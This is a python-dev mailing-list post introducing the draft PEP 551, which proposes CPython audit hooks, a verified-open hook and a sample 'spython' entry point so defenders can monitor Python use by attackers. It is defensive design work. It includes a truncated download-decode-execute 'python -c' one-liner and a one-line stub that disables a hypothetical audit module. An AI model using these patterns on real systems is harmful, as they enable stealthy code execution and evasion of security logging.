[Python-Dev] PEP 551: Security transparency in the Python runtime

Steve Dower steve.dower at python.org
Mon Aug 28 19:55:19 EDT 2017

Hi python-dev,

Those of you who were at the PyCon US language summit this year (or who 
saw the coverage at https://lwn.net/Articles/723823/) may recall that I 
talked briefly about the ways Python is used by attackers to gain and/or 
retain access to systems on local networks.

I present here PEP 551, which proposes the core changes needed to 
CPython to allow sysadmins (or those responsible for defending their 
networks) to gain visibility into the behaviour of Python processes on 
their systems. It has already gone before security-sig, and has had a 
few significant enhancements as a result. There was also quite a 
positive reaction on Twitter after the first posting (I now have a 
significant number of infosec people watching what I do very 
carefully... :) )

Since the PEP should be self-describing, I'll leave context to its text. 
I believe it is ready for discussion, though there are three incomplete 
sections. Firstly, the list of audit locations is not yet complete, but 
is sufficient for the purposes of discussion (I expect to spend time at 
the upcoming dev sprints arguing about these in ridiculous detail).

Second, the performance analysis has not yet been completed with 
sufficient robustness to make a concrete statement about its impact. 
Preliminary tests show negligible impact in the normal case, and the 
"opted-in" case is the user's responsibility. This also relies somewhat 
on the list of hooks being complete and the implementation having 

Third, the section on recommendations is not settled. It is hard to 
recommend approaches in what is very much an evolving field, so I am 
constantly revising parts of this to keep it all restricted to those 
things enabled by or affected by this PEP. I am *not* trying to present 
a full guide on how to prevent attackers breaching your system :)

My current implementation is available at:

The github rendered version of this file is at:

(The one on python.org will update at some point, but is a little behind 
the version in the repo.)



PEP: 551
Title: Security transparency in the Python runtime
Version: $Revision$
Last-Modified: $Date$
Author: Steve Dower <steve.dower at python.org>
Discussions-To: <security-sig at python.org>
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 23-Aug-2017
Python-Version: 3.7
Post-History: 24-Aug-2017 (security-sig)


This PEP describes additions to the Python API and specific behaviors 
for the
CPython implementation that make actions taken by the Python runtime 
visible to
security and auditing tools. The goals in order of increasing importance 
are to
prevent malicious use of Python, to detect and report on malicious use, 
and most
importantly to detect attempts to bypass detection. Most of the 
for implementation is required from users, who must customize and build 
for their own environment.

We propose two small sets of public APIs to enable users to reliably 
build their
copy of Python without having to modify the core runtime, protecting future
maintainability. We also discuss recommendations for users to help them 
and configure their copy of Python.


Software vulnerabilities are generally seen as bugs that enable remote or
elevated code execution. However, in our modern connected world, the more
dangerous vulnerabilities are those that enable advanced persistent threats
(APTs). APTs are achieved when an attacker is able to penetrate a network,
establish their software on one or more machines, and over time extract 
data or
intelligence. Some APTs may make themselves known by maliciously 
damaging data
(e.g., `WannaCrypt 
or hardware (e.g., `Stuxnet 
Most attempt to hide their existence and avoid detection. APTs often use a
combination of traditional vulnerabilities, social engineering, phishing (or
spear-phishing), thorough network analysis, and an understanding of
misconfigured environments to establish themselves and do their work.

The first infected machines may not be the final target and may not require
special privileges. For example, an APT that is established as a
non-administrative user on a developer’s machine may have the ability to 
to production machines through normal deployment channels. It is common 
for APTs
to persist on as many machines as possible, with sheer weight of 
presence making
them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their 
tracks, the
biggest barrier to detection is a lack of insight. System administrators 
large networks rely on distributed logs to understand what their 
machines are
doing, but logs are often filtered to show only error conditions. APTs 
that are
attempting to avoid detection will rarely generate errors or abnormal 
Reviewing normal operation logs involves a significant amount of effort, 
work is underway by a number of companies to enable automatic anomaly 
within operational logs. The tools preferred by attackers are ones that are
already installed on the target machines, since log messages from these 
are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the 
of APTs or methods and mitigations that do not apply to this PEP. For 
information about the field, we recommend reading or watching the resources
listed under `Further Reading`_.

Python is a particularly interesting tool for attackers due to its 
prevalence on
server and developer machines, its ability to execute arbitrary code 
provided as
data (as opposed to native binaries), and its complete lack of internal
auditing. This allows attackers to download, decrypt, and execute 
malicious code
with a single command::

     python -c "import urllib.request, base64; 

This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being 
written to
disk (base64 is often sufficient to bypass these checks). It also bypasses
protections such as file access control lists or permissions (no file access
occurs), approved application lists (assuming Python has been approved 
for other
uses), and automated auditing or logging (assuming Python is allowed to 
the internet or access another machine on the local network from which 
to obtain
its payload).

General consensus among the security community is that totally preventing
attacks is infeasible and defenders should assume that they will often 
attacks only after they have succeeded. This is known as the "assume breach"
mindset. [1]_ In this scenario, protections such as sandboxing and input
validation have already failed, and the important task is detection, 
and eventual removal of the malicious code. To this end, the primary feature
required from Python is security transparency: the ability to see what
operations the Python runtime is performing that may indicate anomalous or
malicious use. Preventing such use is valuable, but secondary to the need to
know that it is occurring.

To summarise the goals in order of increasing importance:

* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]_

Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given the value of 
logs events are not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than 
at the source (see the No Easy Breach video from `Further Reading`_). Events
that are always of interest include attempts to bypass auditing, attempts to
load and execute code that is not correctly signed or access-controlled, 
use of
uncommon operating system functionality such as debugging or inter-process
inspection tools, most network access and DNS resolution, and attempts 
to create
and hide files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in 
order to
detect abnormal or malicious usage. Currently, the Python runtime does not
provide any ability to do this, which (anecdotally) has led to organizations
switching to other languages. The aim of this PEP is to enable system
administrators to deploy a security transparent copy of Python that can
integrate with their existing auditing and protection systems.

On Windows, some specific features that may be enabled by this include:

* Script Block Logging [3]_
* DeviceGuard [4]_
* AMSI [5]_
* Persistent Zone Identifiers [6]_
* Event tracing (which includes event forwarding) [7]_

On Linux, some specific features that may be integrated are:

* gnupg [8]_
* sd_journal [9]_
* OpenBSM [10]_
* syslog [11]_
* auditd [12]_
* SELinux labels [13]_
* check execute bit on imported modules

On macOS, some features that may be used with the expanded APIs are:

* OpenBSM [10]_
* syslog [11]_

Overall, the ability to enable these platform-specific features on 
machines is highly appealing to system administrators and will make Python a
more trustworthy dependency for application developers.

Overview of Changes

True security transparency is not fully achievable by Python in 
isolation. The
runtime can audit as many events as it likes, but unless the logs are 
and analyzed there is no value. Python may impose restrictions in the 
name of
security, but usability may suffer. Different platforms and environments 
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
encouraged to do so.

The aim of these changes is to enable system administrators to integrate 
into their existing security systems, without dictating what those 
systems look
like or how they should behave. We propose two API changes to enable 
this: an
Audit Hook and Verified Open Hook. Both are not set by default, and both 
modifications to the entry point binary to enable any functionality. For the
purposes of validation and example, we propose a new 
entry point program that enables some basic functionality using these hooks.
**However, security-conscious organizations are expected to create their own
entry points to meet their own needs.**

Audit Hook

In order to achieve security transparency, an API is required to raise 
from within certain operations. These operations are typically deep 
within the
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.

The new APIs required for audit hooks are::

    # Add an auditing hook
    sys.addaudithook(hook: Callable[str, tuple]) -> None
    int PySys_AddAuditHook(int (*hook)(const char *event, PyObject *args));

    # Raise an event with all auditing hooks
    sys.audit(str, *args) -> None
    int PySys_Audit(const char *event, PyObject *args);

    # Internal API used during Py_Finalize() - not publicly accessible
    void _Py_ClearAuditHooks(void);

Hooks are added by calling ``PySys_AddAuditHook()`` from C at any time,
including before ``Py_Initialize()``, or by calling 
``sys.addaudithook()`` from
Python code. Hooks are never removed or replaced, and existing hooks have an
opportunity to refuse to allow new hooks to be added (adding an audit 
hook is
audited, and so preexisting hooks can raise an exception to block the new

When events of interest are occurring, code can either call 
from C (while the GIL is held) or ``sys.audit()``. The string argument 
is the
name of the event, and the tuple contains arguments. A given event name 
have a fixed schema for arguments, and both arguments are considered a 
API (for a given x.y version of Python), and thus should only change between
feature releases with updated documentation.

When an event is audited, each hook is called in the order it was added 
with the
event name and tuple. If any hook returns with an exception set, later 
hooks are
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.

When an event is audited but no hooks have been set, the ``audit()`` 
should include minimal overhead. Ideally, each argument is a reference to
existing data rather than a value calculated just for the auditing call.

As hooks may be Python objects, they need to be freed during 
To do this, we add an internal API ``_Py_ClearAuditHooks()`` that 
releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This 
is an
internal function with no public export, but it triggers an event for 
all audit
hooks to ensure that unexpected calls are logged.

See `Audit Hook Locations`_ for proposed audit hook points and schemas, 
and the
`Recommendations`_ section for discussion on appropriate responses.

Verified Open Hook

Most operating systems have a mechanism to distinguish between files 
that can be
executed and those that can not. For example, this may be an execute bit 
in the
permissions field, or a verified hash of the file contents to detect 
code tampering. These are an important security mechanism for preventing
execution of data or code that is not approved for a given environment.
Currently, Python has no way to integrate with these when launching 
scripts or
importing modules.

The new public API for the verified open hook is::

    # Set the handler
    int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char 
*narrow, const wchar_t *wide))

    # Open a file using the handler

The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
binary access - any more restrictive behaviour requires the use of a custom
handler. (Aside: since ``importlib`` requires access to this function 
before the
``os`` module has been imported, it will be available on the 
modules, but the intent is that other users will access it through the 

A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()`` 
from C
at any time, including before ``Py_Initialize()``. When 
``open_for_exec()`` is
called with a handler set, the handler will be passed the processed 
narrow or
wide path, depending on platform, and its return value will be returned
directly. The returned object should be an open file-like object that 
reading raw bytes. This is explicitly intended to allow a ``BytesIO`` 
if the open handler has already had to read the file into memory in order to
perform whatever verification is necessary to determine whether the 
content is
permitted to be executed.

Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.

If the handler determines that the file is not suitable for execution, 
it should
raise an exception of its choice, as well as raising any other auditing 
or notifications.

All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to 
note that
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function - an audit hook that includes the code from these calls will be 
and is the best opportunity to validate code that is read from the file. 
the current decoupling between import and execution in Python, most imported
code will go through both ``open_for_exec()`` and the log hook for 
and so care should be taken to avoid repeating verification steps.

.. note::
    The use of ``open_for_exec()`` by ``importlib`` is a valuable first 
    but should not be relied upon to prevent misuse. In particular, it 
is easy
    to monkeypatch ``importlib`` in order to bypass the call. Auditing 
hooks are
    the primary way to achieve security transparency, and are essential for

API Availability

While all the functions added here are considered public and stable API, the
behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.

For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but 
may do
nothing. This allows code to make calls to ``sys.audit()`` without having to
test for existence, but it should not assume that its call will have any 
(Including existence tests in security-critical code allows another 
vector to
bypass auditing, so it is preferable that the function always exist.)

``os.open_for_exec(pathlike)`` should at a minimum always return
``_io.open(pathlike, 'rb')``. Code using the function should make no further
assumptions about what may occur, and implementations other than CPython 
are not
required to let developers override the behavior of this function with a 

Audit Hook Locations

Calls to ``sys.audit()`` or ``PySys_Audit()`` will be added to the following
operations with the schema in Table 1. Unless otherwise specified, the 
for audit hooks to abort any listed operation should be considered part 
of the
rationale for including the hook.

.. csv-table:: Table 1: Audit Hooks
    :header: "API Function", "Event Name", "Arguments", "Rationale"
    :widths: 2, 2, 3, 6

    ``PySys_AddAuditHook``, ``sys.addaudithook``, "", "Detect when new audit
    hooks are being added."
    ``_PySys_ClearAuditHooks``, ``sys._clearaudithooks``, "", "Notifies 
    they are being cleaned up, mainly in case the event is triggered
    unexpectedly. This event cannot be aborted."
    ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", 
    any attempt to set the ``open_for_execute`` handler."
    "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``, 
    ", ``compile``, "``(code, filename_or_none)``", "Detect dynamic code
    compilation, where ``code`` could be a string or AST. Note that this 
will be
    called for regular imports of source code, including those that were 
    with ``open_for_exec``."
    "``exec``, ``eval``, ``run_mod``", ``exec``, "``(code_object,)``", 
    dynamic execution of code objects. This only occurs for explicit 
calls, and
    is not raised for normal function invocation."
    ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
    sys.path_hooks)``", "Detect when modules are imported. This is 
raised before
    the module name is resolved to a file. All arguments other than the 
    name may be ``None`` if they are not used or available."
    ``code_new``, ``code.__new__``, "``(bytecode, filename, name)``", 
    dynamic creation of code objects. This only occurs for direct 
    and is not raised for normal compilation."
    "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
    ``(module_or_path,)``", "Detect when native modules are used."
    ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", 
    information about specific symbols retrieved from native modules."
    ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect 
when code
    is accessing arbitrary memory using ``ctypes``"
    ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing 
the id of
    objects, which in CPython reveals information about memory layout."
    ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect 
    code is accessing frames directly"
    ``sys._current_frames``, ``sys._current_frames``, "", "Detect when 
code is
    accessing frames directly"
    ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is 
    trace functions. Because of the implementation, exceptions raised 
from the
    hook will abort the operation, but will not be raised in Python 
code. Note
    that ``threading.setprofile`` eventually calls this function, so the 
    will be audited for each thread."
    ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is 
    trace functions. Because of the implementation, exceptions raised 
from the
    hook will abort the operation, but will not be raised in Python 
code. Note
    that ``threading.settrace`` eventually calls this function, so the event
    will be audited for each thread."
    ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
    Detect changes to async generator hooks."
    ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
    Detect changes to async generator hooks."
    ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "", 
    changes to the coroutine wrapper."
    ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, 
"``(new_limit,)``", "
    Detect changes to the recursion limit."
    ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, 
    ", "Detect changes to the switching interval."
    "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
    ``socket.getaddrinfo``, ``socket.getnameinfo``, ``socket.sendmsg``,
    ``socket.sendto``", ``socket.address``, "``(address,)``", "Detect 
access to
    network resources. The address is unmodified from the original call."
    ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
    creation of sockets. The arguments will be int values."
    ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
    retrieve the current host name."
    ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
    attempts to change the current host name. The name argument is 
passed as a
    bytes object."
    "``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
    ``socket.gethostbyname``", "``(name,)``", "Detect host name 
resolution. The
    name argument is a str or bytes object."
    ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, 
"``(address,)``", "Detect
    host resolution. The address argument is a str or bytes object."
    ``socket.getservbyname``, ``socket.getservbyname``, "``(name, 
protocol)``", "
    Detect service resolution. The arguments are str objects."
    ``socket.getservbyport``, ``socket.getservbyport``, "``(port, 
protocol)``", "
    Detect service resolution. The port argument is an int and protocol is a
    ``type.__setattr__``","``(type, attr_name, value)``","Detect monkey 
    of types. This event is only raised when the object is an instance of
    "``_PyObject_GenericSetAttr``, ``check_set_special_type_attr``,
    ``object_set_class``",``object.__setattr__``,"``(object, attr, 
    Detect monkey patching of objects. This event is raised for the 
    attribute and any attribute on ``type`` objects."
    Detect deletion of object attributes. This event is raised for any 
    on ``type`` objects."
    global_name)``","Detect imports and global name lookup when unpickling."

TODO - more hooks in ``_socket``, ``_ssl``, others?
* code objects
* function objects

SPython Entry Point

A new entry point binary will be added, called ``spython.exe`` on 
Windows and
``spythonX.Y`` on other platforms. This entry point is intended 
primarily as an
example, as we expect most users of this functionality to implement 
their own
entry point and hooks (see `Recommendations`_). It will also be used for 

Source builds will build ``spython`` by default, but distributions 
should not
include it except as a test binary. The python.org managed binary 
will not include ``spython``.

**Do not accept most command-line arguments**

The ``spython`` entry point requires a script file be passed as the first
argument, and does not allow any options. This prevents arbitrary code 
from in-memory data or non-script files (such as pickles, which can be 
using ``-m pickle <path>``.

Options ``-B`` (do not write bytecode), ``-E`` (ignore environment 
and ``-s`` (no user site) are assumed.

If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it 
will be
used to initialize ``sys.path`` following the rules currently described `for
Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.

When built with ``Py_DEBUG``, the ``spython`` entry point will allow a 
option with no other arguments to enter into interactive mode, with audit
messages being written to standard error rather than a file. This is 
for testing and debugging only.

**Log security events to a file**

Before initialization, ``spython`` will set an audit hook that writes 
events to
a local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in

The audit hook will also abort all ``sys.addaudithook`` events, 
preventing any
other hooks from being added.

**Restrict importable modules**

Also before initialization, ``spython`` will set an open-for-execute 
hook that
validates all files opened with ``os.open_for_exec``. This 
implementation will
require all files to have a ``.py`` suffix (thereby blocking the use of 
bytecode), and will raise a custom audit event ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.

On Windows, the hook will also open the file with flags that prevent any 
process from opening it with write access, which allows the hook to perform
additional validation on the contents with confidence that it will not be
modified between the check and use. Compilation will later trigger a 
event, so there is no need to read the contents now for AMSI, but other
validation mechanisms such as DeviceGuard [4]_ should be performed here.

**Restrict globals in pickles**

The ``spython`` entry point will abort all ``pickle.find_class`` events 
that use
the default implementation. Overrides will not raise audit events unless
explicitly added, and so they will continue to be allowed.

Performance Impact


Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.audit`` with no hooks added does not significantly affect
any existing benchmarks, though targeted microbenchmarks can observe an 

Performance impact using ``spython`` or with hooks added are not of interest
here, since this is considered opt-in functionality.


Specific recommendations are difficult to make, as the ideal 
configuration for
any environment will depend on the user's ability to manage, monitor, and
respond to activity on their own network. However, many of the proposals 
here do
not appear to be of value without deeper illustration. This section provides
recommendations using the terms **should** (or **should not**), 
indicating that
we consider it dangerous to ignore the advice, and **may**, indicating 
that for
the advice ought to be considered for high value systems. The term 
refers to whoever is responsible for deploying Python throughout your 
different organizations may have an alternative title for the responsible

Sysadmins **should** build their own entry point, likely starting from the
``spython`` source, and directly interface with the security systems 
in their environment. The more tightly integrated, the less likely a
vulnerability will be found allowing an attacker to bypass those systems. In
particular, the entry point **should not** obtain any settings from the 
environment, such as environment variables, unless those settings are 
protected from modification.

Audit messages **should not** be written to a local file. The 
``spython`` entry
point does this for example and testing purposes. On production 
machines, tools
such as ETW [7]_ or auditd [12]_ that are intended for this purpose 
should be

The default ``python`` entry point **should not** be deployed to production
machines, but could be given to developers to use and test Python on
non-production machines. Sysadmins **may** consider deploying a less 
version of their entry point to developer machines, since any system 
to your network is a potential target. Sysadmins **may** deploy their 
own entry
point as ``python`` to obscure the fact that extra auditing is being 

Python deployments **should** be made read-only using any available platform
functionality after deployment and during use.

On platforms that support it, sysadmins **should** include signatures 
for every
file in a Python deployment, ideally verified using a private 
certificate. For
example, Windows supports embedding signatures in executable files and using
catalogs for others, and can use DeviceGuard [4]_ to validate signatures 
automatically or using an ``open_for_exec`` hook.

Sysadmins **should** log as many audited events as possible, and 
**should** copy
logs off of local machines frequently. Even if logs are not being constantly
monitored for suspicious activity, once an attack is detected it is too 
late to
enable auditing. Audit hooks **should not** attempt to preemptively filter
events, as even benign events are useful when analyzing the progress of
an attack. (Watch the "No Easy Breach" video under `Further Reading`_ for a
deeper look at this side of things.)

Most actions **should not** be aborted if they could ever occur during 
use or if preventing them will encourage attackers to work around them. As
described earlier, awareness is a higher priority than prevention. Sysadmins
**may** audit their Python code and abort operations that are known to 
never be
used deliberately.

Audit hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than to
prevent them.

Sysadmins **should** identify correlations between events, as a change to
correlated events may indicate misuse. For example, module imports will
typically trigger the ``import`` auditing event, followed by an
``open_for_exec`` call and usually a ``compile`` event. Attempts to bypass
auditing will often suppress some but not all of these events. So if the log
contains ``import`` events but not ``compile`` events, investigation may be

The first audit hook **should** be set in C code before ``Py_Initialize`` is
called, and that hook **should** unconditionally abort the 
event. The Python interface is primarily intended for testing and 

To prevent audit hooks being added on non-production machines, an entry 
**may** add an audit hook that aborts the ``sys.addloghook`` event but 
does nothing.

On production machines, a non-validating ``open_for_exec`` hook **may** 
be set
in C code before ``Py_Initialize`` is called. This prevents later code from
overriding the hook, however, logging the ``setopenforexecutehandler`` 
event is
useful since no code should ever need to call it. Using at least the sample
``open_for_exec`` hook implementation from ``spython`` is recommended.

Since ``importlib``'s use of ``open_for_exec`` may be easily bypassed with
monkeypatching, an audit hook **should** be used to detect attribute 
changes on
type objects.

[TODO: more good advice; less bad advice]

Rejected Ideas

Separate module for audit hooks

The proposal is to add a new module for audit hooks, hypothetically 
This would separate the API and implementation from the ``sys`` module, and
allow naming the C functions ``PyAudit_AddHook`` and ``PyAudit_Audit`` 
than the current variations.

Any such module would need to be a built-in module that is guaranteed to 
be present. The nature of these hooks is that they must be callable without
condition, as any conditional imports or calls provide more opportunities to
intercept and suppress or modify events.

Given its nature as one of the most core modules, the ``sys`` module is 
protected against module shadowing attacks. Replacing ``sys`` with a
sufficiently functional module that the application can still run is a 
much more
complicated task than replacing a module with only one function of 
interest. An
attacker that has the ability to shadow the ``sys`` module is already 
capable of
running arbitrary code from files, whereas an ``audit`` module can be 
with a single statement::

     import sys; sys.modules['audit'] = type('audit', (object,), 
{'audit': lambda *a: None, 'addhook': lambda *a: None})

Multiple layers of protection already exist for monkey patching attacks 
either ``sys`` or ``audit``, but assignments or insertions to 
are not audited.

This idea is rejected because it makes substituting ``audit`` calls 
all callers near trivial.

Flag in sys.flags to indicate "secure" mode

The proposal is to add a value in ``sys.flags`` to indicate when Python is
running in a "secure" mode. This would allow applications to detect when 
features are enabled and modify their behaviour appropriately.

Currently there are no guarantees made about security by this PEP - this 
is the first time the word "secure" has been used. Security **transparency**
does not result in any changed behaviour, so there is no appropriate 
reason for
applications to modify their behaviour.

Both application-level APIs ``sys.audit`` and ``os.open_for_exec`` are 
present and functional, regardless of whether the regular ``python`` 
entry point
or some alternative entry point is used. Callers cannot determine 
whether any
hooks have been added (except by performing side-channel analysis), nor 
do they
need to. The calls should be fast enough that callers do not need to 
avoid them,
and the sysadmin is responsible for ensuring their added hooks are fast 
to not affect application performance.

The argument that this is "security by obscurity" is valid, but irrelevant.
Security by obscurity is only an issue when there are no other protective
mechanisms; obscurity as the first step in avoiding attack is strongly
recommended (see `this article
<https://danielmiessler.com/study/security-by-obscurity/>`_ for discussion).

This idea is rejected because there are no appropriate reasons for an
application to change its behaviour based on whether these APIs are in use.

Further Reading

**Redefining Malware: When Old Terms Pose New Threats**
     By Aviv Raff for SecurityWeek, 29th January 2014

     This article, and those linked by it, are high-level summaries of 
the rise of
     APTs and the differences from "traditional" malware.


**Anatomy of a Cyber Attack**
     By FireEye, accessed 23rd August 2017

     A summary of the techniques used by APTs, and links to a number of 


**Automated Traffic Log Analysis: A Must Have for Advanced Threat 
     By Aviv Raff for SecurityWeek, 8th May 2014

     High-level summary of the value of detailed logging and automatic 


**No Easy Breach: Challenges and Lessons Learned from an Epic 
     Video presented by Matt Dunwoody and Nick Carr for Mandiant at 
SchmooCon 2016

     Detailed walkthrough of the processes and tools used in detecting 
and removing
     an APT.


**Disrupting Nation State Hackers**
     Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

     Good security practices, capabilities and recommendations from the 
chief of
     NSA's Tailored Access Operation.



.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_

.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
    Protection Advances in Windows 10, 

.. [3] 

.. [4] `<https://aka.ms/deviceguard>`_

.. [5] AMSI, 

.. [6] Persistent Zone Identifiers, 

.. [7] Event tracing, 

.. [8] `<https://www.gnupg.org/>`_

.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_

.. [10] `<http://www.trustedbsd.org/openbsm.html>`_

.. [11] `<https://linux.die.net/man/3/syslog>`_

.. [12] 

.. [13] SELinux access decisions 


Thanks to all the people from Microsoft involved in helping make the Python
runtime safer for production use, and especially to James Powell for 
doing much
of the initial research, analysis and implementation, Lee Holmes for 
insights into the info-sec field and PowerShell's responses, and Brett 
for the grounding discussions.


Copyright (c) 2017 by Microsoft Corporation. This material may be 
only subject to the terms and conditions set forth in the Open Publication
License, v1.0 or later (the latest version is presently available at

More information about the Python-Dev mailing list